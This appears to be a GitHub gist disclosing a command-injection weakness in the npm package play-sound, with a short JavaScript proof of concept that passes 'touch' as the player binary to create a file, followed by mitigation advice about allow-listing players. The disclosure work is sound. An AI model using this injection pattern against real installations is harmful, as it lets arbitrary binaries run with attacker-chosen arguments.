Gist mcoimbra/16b38f4f0a2cd31c36fd339032ac9ff3, last active October 29, 2023 12:24
Package play-sound: the function spawn is called (#40) with one parameter for the binary and another array parameter for its arguments. Both can be influenced through the main package class constructor and its play(…) method.
```js
'use strict'
const pkg = require('play-sound');
// The constructor option `player` becomes the binary name passed to spawn.
const opts = {
  player: 'touch'
};
const play = pkg(opts);
// The first argument of play() is appended to the argument array.
const what = 'exploited.txt';
// Options are keyed by player name and supply extra arguments for that player.
const options = {
  touch: 'test'
};
const next = function(){};
// This will create an 'exploited.txt' file locally.
play.play(what, options, next);
```
A potential security measure for the package maintainers would be to only allow for a set of players.
If they still intend to enable injection, some additional safety precautions would need to be made to ensure only a binary from a select set of binaries could be executed.
I note that this would potentially require considerable effort and domain knowledge of existing players' parameters to avoid, for example, the execution of a custom malicious binary with the same name as a known player.